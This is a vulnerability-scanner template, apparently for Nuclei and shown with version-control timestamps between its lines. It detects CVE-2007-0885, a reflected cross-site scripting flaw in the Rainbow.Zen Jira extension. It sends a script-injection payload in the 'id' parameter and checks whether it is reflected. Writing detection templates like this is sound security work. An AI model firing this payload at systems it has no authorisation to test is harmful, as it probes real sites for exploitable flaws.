2021-07-16 17:34:42 +00:00
id : CVE-2007-0885
info :
name : Rainbow.Zen Jira XSS
description : Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference : https://www.securityfocus.com/archive/1/459590/100/0/threaded
author : geeknik
severity : medium
tags : cve,cve2007,jira,xss
requests :
- method : GET
path :
2021-08-22 18:59:23 +00:00
- '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'
2021-07-16 17:34:42 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-08-22 18:59:23 +00:00
- '"><script>alert(document.domain)</script>'
2021-07-25 20:15:28 +00:00
2021-07-16 17:34:42 +00:00
- type : status
status :
- 200
2021-07-25 20:15:28 +00:00
2021-07-16 17:34:42 +00:00
- type : word
part : header
2021-07-17 04:29:54 +00:00
words :
2021-07-16 17:34:42 +00:00
- "text/html"
